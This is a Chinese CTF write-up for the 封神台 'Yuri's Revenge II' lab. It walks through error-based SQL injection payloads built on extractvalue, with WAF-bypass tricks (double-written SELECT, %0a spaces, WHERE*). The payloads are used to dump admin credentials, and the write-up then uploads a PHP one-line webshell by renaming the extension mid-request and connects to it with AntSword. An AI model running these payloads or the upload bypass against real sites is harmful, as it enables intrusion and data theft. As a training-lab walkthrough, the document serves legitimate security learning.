封神台(尤里的复仇Ⅱ 回归)绕过防护getshell

2023-05-16

解题思路

习惯在url后加admin,看是不是管理后台。
一看发现是,就不用目录扫描工具了
在这里插入图片描述
填入正确的验证码,抓包输入',查看有无报错
发现报错了,存在报错注入,看报错描述可以知道是字符型注入
在这里插入图片描述
查看当前数据库
payload

' or extractvalue(1,concat(0x7e,database()))%23

在这里插入图片描述
查看当前库的所有表
payload

' or extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())))%23

爆出错误,可以看到select被吃了
在这里插入图片描述
尝试双写+大小写绕过
payload

user=' or extractvalue(1,concat(0x7e,(SEselectlECT group_concat(table_name)from information_schema.tables where table_schema=database())))%23

select出来了,但是看到=被吃掉了
在这里插入图片描述
使用like替代=
payload

' or extractvalue(1,concat(0x7e,(SEselectlECT group_concat(table_name)from information_schema.tables where table_schema like database())))%23

where去哪了??
在这里插入图片描述
在where后加个*
payload

' or extractvalue(1,concat(0x7e,(SEselectlECT group_concat(table_name)from information_schema.tables WHERE* table_schema like database())))%23

经过一系列的绕过技术,查询语句终于奏效
在这里插入图片描述
extractvalue()函数默认报错显示32个字符,剩下的字符可以用substr(column,31,62)查询后32个字符,以此类推。

payload

' or extractvalue(1,concat(0x7e,(SEselectlECT substr(group_concat(table_name),31,62)from information_schema.tables WHERE* table_schema like database())))%23

在这里插入图片描述

盲猜账号密码在bees_admin表中,直接查bees_admin字段名
payload

' or extractvalue(1,concat(0x7e,(SEselectlECT group_concat(column_name) from information_schema.columns where* table_name like 'bees_admin' and table_schema like database())))%23

这里将空格全部转为%0a,因为有时候可能是匹配关键字+空格导致吃掉关键字,其实从一开始就把空格变为%0a,就可以不用绕过太多关键字
payload

'%0aor%0aextractvalue(1,concat(0x7e,(SEselectlECT%0agroup_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere*%0atable_name%0alike%0a'bees_admin'%0aand%0atable_schema%0alike%0adatabase())))%23

我这里写了个py脚本进行转换

sql = r"""' or extractvalue(1,concat(0x7e,(SEselectlECT group_concat(column_name) from information_schema.columns where* table_name like 'bees_admin' and table_schema like database())))%23"""
# 将空格替换成%0a
def spaceBypass(sql):
    str = sql.replace(' ','%0a')
    return str
sql = spaceBypass(sql)
print(sql)

可以查询到bees_admin的字段
在这里插入图片描述
接下来查询admin_name和admin_password的值
原来payload

' or extractvalue(1,concat(0x7e,(SEselectlECT group_concat(concat(admin_name,':',admin_password)) from bees.bees_admin)))%23

绕过空格payload

'%0aor%0aextractvalue(1,concat(0x7e,(SEselectlECT%0agroup_concat(concat(admin_name,':',admin_password))%0afrom%0abees.bees_admin)))%23

在这里插入图片描述
防止还有字符没显示出来,使用substr(str,31,62)查看一下后面的内容
payload

'%0aor%0aextractvalue(1,concat(0x7e,substr((SEselectlECT%0agroup_concat(concat(admin_name,':',admin_password))%0afrom%0abees.bees_admin),31,62)))%23

可以看到flag
在这里插入图片描述
注意:这里的4跟前面最后一个4是重复的
继续往后查询
substr(str,62,93)

'%0aor%0aextractvalue(1,concat(0x7e,substr((SEselectlECT%0agroup_concat(concat(admin_name,':',admin_password))%0afrom%0abees.bees_admin),62,93)))%23

在这里插入图片描述
将上面flag组合起来就是flag:47ec2dd791e31e2ef2076caf64ed9b3d
解码test123456,拿去一试发现错误,已经习惯了
只好查询账号密码登录后台
组合admin:21232f297a57a5a743894a0e4a801fc3
在这里插入图片描述
所以账号密码就是admin admin
在这里插入图片描述
找到上传点,上传一句话
在这里插入图片描述
shell.jpg内容如下
在这里插入图片描述
上传的时候抓包,修改后缀名为php,从而绕过前端后缀名验证
在这里插入图片描述
上传成功
在这里插入图片描述
可以在burpsuite看到上传点
在这里插入图片描述
浏览器访问上传点看能否访问
接着使用蚁剑连接
在这里插入图片描述

在这里插入图片描述
连接成功,开始找flag
在这里插入图片描述
在BEES根目录下找到flag.txt
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

封神台(尤里的复仇Ⅱ 回归)绕过防护getshell 的相关文章

  • C# 实现RDP远程桌面连接

    C 实现RDP远程桌面连接 因为频繁的访问远程windows server服务器 xff0c 每次调出cmd运行mstsc xff0c 然后输入一大串信息去链接就显得有些繁琐了 为方便计 xff0c 于是使用C 编写一个小工具 功能相当简陋
  • 单片机小白学习之路(十七)---计算初值

    目标 xff1a 学会计算初值 1 为什么要初值 xff1f 给单片机的定时器赋初值是为了取得准确的自己需要的定时时间 xff0c 比如我想定时100秒 xff0c 你数0 255要256秒 xff08 最大定时长 xff09 xff0c
  • hadoop-hdfs初学之基本常用命令的IDEA实现

    刚开始学hadoop xff0c 大家一起加油 xff0c 再接再厉 span class token keyword package span span class token namespace com span class token
  • ubuntu20.04卸载virtualbox失败,“if your system is using efi secure boot you may need to sign the kernel “

    ubuntu20 04卸载virtualbox失败 xff0c 报错信息中有 if your system is using efi secure boot you may need to sign the kernel modules v
  • [算法]马走日

    题目描述 xff1a 在国际象棋中 xff0c 马的走法与中国象棋类似 xff0c 即俗话说的 马走日 xff0c 下图所示即国际象棋中马每一步能到达的格子 xff08 箭头所指为每步到达位置 xff09 现有一200 200大小的国际象棋
  • 咪咕盒子MGV2000电视盒子刷机教程

    第一步 xff1a 使用U盘里面新建文件夹重命名为 xff1a upgrade 第二步 xff1a 下载更新包放到uprade文件夹内 xff0c 下载地址 xff1a https download csdn net download cy
  • edge浏览器配置跨域完整流程-前端

    edge浏览器配置跨域完整流程 前端 1 在D盘下创建 edgeFile 新文件夹 2 进入edge文件位置 复制自己的edge 名字就叫dev 可以随便取 3 右键选中dev点击属性 配置edge的目标路径 C Program Files
  • oracle11g无法导出空表问题

    产生原因 xff1a oracle11g为了节约空间 xff0c 对空表不分配segment 解决方法 方法1 用如下语句设置空表可导出 xff1a alter system set deferred segment creation 61
  • 将dwg文件转为shp文件

    将dwg文件转为shp文件 xff08 包括dwg的注记转换 xff09 目的 xff1a 利用ArcGIS软件 将dwg文件中的面状要素转为shp格式 xff0c 并将dwg中的注记转换成shp文件中的字段 方法一 xff1a 1 将dw
  • ArcGIS坐标转换

    地理坐标系 xff1a 常用的地理坐标系 xff1a WGS84坐标系 CGCS2000坐标系 北京54坐标系 西安80坐标系 地理坐标系是是球面坐标系统 xff0c 通过经度 纬度 对地球表面点进行说明 不同地理坐标系的主要区别在于其采用
  • arcmap字段计算器的使用

    需求1 xff1a 某个要素类中的某个字段的数据前有空格 xff0c 需将空格批量删除 解决方法 xff1a 打开arcmap xff0c 添加图层 xff0c 选择开始编辑 xff08 如下图 xff09 选中图层 xff0c 右键打开属
  • ArcMap 数据的标注和注记

    标注 xff1a 可按照当前地图比例尺下的最佳位置重新加载 注记 xff1a 每条注记都存储自身的位置 注记可由标注转化而来 本文包括几种基本的标注方法 包括多属性字段标注 分类标注 分数型标注 道路名称标注等 多个属性字段标注 如下图 x
  • ArcMap 矢量数据空间校正

    功能 xff1a 将存在偏移 误差的数据进行校正 本文包括图形位移校正 橡皮拉伸 接边的操作方法 情况1 xff1a 两图层存在位置偏移 xff0c 现需校正其中一个数据 xff0c 使两个数据完全重合 Arcmap中放入两个数据 xff0
  • 【oracle报错】 exp-00106数据链接口令无效

    问题 xff1a 用exp导出数据库中的data 1表 xff0c 报错 exp 00106数据链接口令无效 xff0c 但其他表可正常导出 分析 xff1a 与无效dblink有关 解决过程 xff1a 用查询语句 select from
  • ARCGIS安装及卸载中遇见的一些问题

    1 提示无 netframework3 5 注意 xff1a 缺少 netframework3 5 安装4 5依旧无法安装arccgis desktop 解决方法 xff1a 计算机单击右键选择 管理 xff0c 在 服务管理器 中选择 添
  • ora-00972标识符过长

    ora 00972标识符过长 可能原因 xff1a Oracle中表名 xff0c 列名 xff0c 标识列字符不能超过30个字符 但我是利用plsql导入csv格式数据时 xff0c 报错ora 00972 xff0c 表是之前建好的 x
  • Ubuntu切换内地源

    编辑 etc apt sources list删除里面的所有内容添加以下内容到sources中保存即可 阿里云源 deb http mirrors aliyun com ubuntu focal main restricted univer
  • oracle 用exp导出表

    用于导出oracle数据库表空间的表 xff0c 有以下几种情况 一般导出 xff1a exp username password 64 ip地址 实例 file 61 路径及文件名 导出表空间指定的表 exp username passw
  • 动态获取API的地址

    原理 xff1a 现在虽然大部分Win32程序都使用ExitProcess函数来终止执行 xff0c 但是其实用ret指令也是可以的 我们的应用程序的主程序可以被看成是一个被Windows调用的子程序 当父进程要创建一个子进程时 xff0c
  • 使用go做后端,用户密码采取bcrpyt哈希加密

    bcrypt哈希由多个部分组成 这些部分用于确定创建哈希的设置 xff0c 从而可以在不需要任何其他信息的情况下对其进行验证 相较于MD5 xff0c SHA 256等哈希算法更适合用于做密码的哈希 xff0c 原因在于bcrypt算法哈希

随机推荐